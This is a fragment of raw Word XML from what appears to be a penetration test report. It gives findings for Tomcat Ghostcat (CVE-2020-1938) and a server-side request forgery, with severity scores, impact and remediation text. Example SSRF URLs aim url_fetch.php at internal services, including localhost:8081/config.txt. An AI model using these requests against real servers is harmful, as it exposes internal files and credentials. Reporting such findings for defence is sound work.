            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F0478" w:rsidRPr="00D77DFE" w14:paraId="434FFC3B"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EBCE89E" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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7.7</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034C400" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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5F0478" w:rsidRPr="00D77DFE" w14:paraId="26B4D94D" w14:textId="77777777" w:rsidTr="007B6EB7">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E8C412B" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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E:F</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/RL:O/RC:C</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5ACF161" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-552: Files or Directories Accessible to External Parties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="5E7211D0"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3012842" w14:textId="777A02FA" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00D84933">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A81422" w:rsidRPr="00D77DFE" w14:paraId="2C5D5C58"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D85AD7D" w14:textId="51286516" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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Browser, CVE-2020-1938 PoC (Ajp Shooter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="36BF87AE" w14:textId="77777777" w:rsidTr="007B6EB7">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EC7EC42" w14:textId="1FE6D947" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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A81422" w:rsidRPr="00D77DFE" w14:paraId="39D1D527" w14:textId="77777777" w:rsidTr="00760AE4">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F9B7484" w14:textId="07266EE3" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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The server runs a Tomcat version vulnerable to CVE‑2020‑1938 (Ghostcat), allowing attackers to read arbitrary files, and in some cases execute code, via the exposed AJP connector.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="618B3C55"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47EDA59" w14:textId="34DC69F0" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable URLs / IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="4E727489"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154D4BF" w14:textId="00FC8905" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:b w:val="0"/>
                  <w:sz w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.2.178/stocznia</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>, 10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="1BAC2BFD"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FD64F47" w14:textId="37C82FC3" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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A81422" w:rsidRPr="00D77DFE" w14:paraId="244275CB"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DE34E5F" w14:textId="24ADBA13" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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This vulnerability allows remote code execution via the AJP connector, exposes sensitive files, and enables privilege escalation with potential lateral movement across the internal network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="5DE4A79C"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0D7B26C" w14:textId="6C7D317E" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A8142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A81422" w:rsidRPr="00D77DFE" w14:paraId="444B144E"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F56C663" w14:textId="77777777" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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 xml:space="preserve">Upgrade Apache Tomcat: Ensure all servers are updated to patched versions </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586F638E" w14:textId="75EF3E0F" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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Disable the AJP Connector if it is not required. Restrict AJP access to localhost or through a secured network with firewall rules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="77AE02AD"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C63B1EF" w14:textId="3F9F8A2E" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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A81422" w:rsidRPr="00D77DFE" w14:paraId="7AC01076"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4B83B1A" w14:textId="35446BAA" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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Cs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Send a crafted AJP request to the vulnerable Tomcat instance and observe that, instead of rejecting it, the server responds by returning internal application files, confirming exposure of the AJP file‑read vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A81422" w:rsidRPr="00D77DFE" w14:paraId="4C0982F4"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BE785ED" w14:textId="77777777" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">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A81422" w:rsidRPr="00D77DFE" w14:paraId="0AEA85AE"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3F1B647" w14:textId="47C969FC" w:rsidR="00A81422" w:rsidRPr="00D77DFE" w:rsidRDefault="00A81422" w:rsidP="00A81422">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA7" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">, Figure A.7 </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>CVE‑2020‑1938 (Ghostcat) Vulnerability</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431D09" w:rsidRPr="00D77DFE" w14:paraId="2E36271B" w14:textId="77777777" w:rsidTr="007B6EB7">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2172D6A" w14:textId="05E16F40" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00A81422">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431D09" w:rsidRPr="00D77DFE" w14:paraId="35AADEA6" w14:textId="77777777" w:rsidTr="00431D09">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8C76CEF" w14:textId="7438D6B0" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00A81422">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/552.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/538.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="046FFCBB" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C1AB87" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F74C31" w14:textId="77777777" w:rsidR="004E2AD7" w:rsidRPr="00D77DFE" w:rsidRDefault="004E2AD7" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-48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433721" w:rsidRPr="00D77DFE" w14:paraId="49C7B047" w14:textId="77777777" w:rsidTr="00094048">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67DF90A" w14:textId="28BCBC15" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721" w:rsidP="009E5B3F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SSRF that accesses internal services (ports 631 and 8081)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00433721" w:rsidRPr="00D77DFE" w14:paraId="564624E2" w14:textId="77777777" w:rsidTr="00094048">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A4E45BA" w14:textId="1EEE56B5" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="0043372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7D5F5DF" w14:textId="0A701519" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="0043372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433721" w:rsidRPr="00D77DFE" w14:paraId="08FB8A41"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CC25DC0" w14:textId="760D8E24" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721"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VUL_0</w:t>
            </w:r>
            <w:r w:rsidR="0000764E" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</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7934CF1" w14:textId="17119EDB" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721"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688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F44EF16" wp14:editId="2BB4ECFB">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>872239</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>51745</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="369640166" name="Rectangle: Rounded Corners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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>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8C934BE" id="Rectangle: Rounded Corners 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:68.7pt;margin-top:4.05pt;width:125.8pt;height:10.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00AD2301" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00433721" w:rsidRPr="00D77DFE" w14:paraId="274B03D1"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4F384C7" w14:textId="792845E4" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721"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w:t>
            </w:r>
            <w:r w:rsidR="00AD2301" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7.5</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D39A3BA" w14:textId="77777777" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721"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433721" w:rsidRPr="00D77DFE" w14:paraId="6BC2EDF2" w14:textId="77777777" w:rsidTr="00094048">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3DE3C7A" w14:textId="0B86A415" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD2301" w:rsidP="00C420B0">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/AC:H/</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/S:C/C:H/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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FC2B5BC" w14:textId="4BA40C0E" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-918: Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="2361E1AA"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02F5879" w14:textId="6675A4C5" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E091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3E0912" w:rsidRPr="00D77DFE" w14:paraId="64EBD37C"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FE2A549" w14:textId="461D2087" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912"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Browser, Burp Suite Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="27DAB4D2" w14:textId="77777777" w:rsidTr="00094048">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08E8D96" w14:textId="43E07ED9" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="00D84933">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3E0912" w:rsidRPr="00D77DFE" w14:paraId="2EE71138" w14:textId="77777777" w:rsidTr="00094048">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E5F08F2" w14:textId="5C53193B" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">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Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>Side Request Forgery (SSRF) allows an attacker to trick the server into making unintended requests. This can expose internal services, leak sensitive data, or allow access to resources not normally reachable from the external environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="57EB654B"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5E75D19" w14:textId="3831593B" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">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3E0912" w:rsidRPr="00D77DFE" w14:paraId="76292A3D" w14:textId="77777777" w:rsidTr="00094048">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DF975CD" w14:textId="24464E2A" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.3.190:80/url_fetch.php?url=localhost:8081/config.txt</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.3.190:80/url_fetch.php?url=localhost:631</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> , 10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="2F1D8310"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9B0CFB8" w14:textId="5F34D3F6" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Implications / Consequences of not Fixing the Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="69012570"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CE49A52" w14:textId="7C417CA1" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This exposure reveals sensitive credentials, grants access to internal administrative </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>interfaces, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> provides attackers with a foothold for lateral movement across the internal network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="38C13F23"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86A1556" w14:textId="703BB57C" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E091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3E0912" w:rsidRPr="00D77DFE" w14:paraId="2B86DF92"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C97182A" w14:textId="3DAE40E5" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E091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Mitigate SSRF by validating and allowlisting user-supplied URLs, blocking requests to internal or localhost addresses, and temporarily disabling unsafe network-request features</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="1BC4596C"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95923EE" w14:textId="1E94071B" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Steps to Reproduce:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="520200A8"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DE55531" w14:textId="26F1A001" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
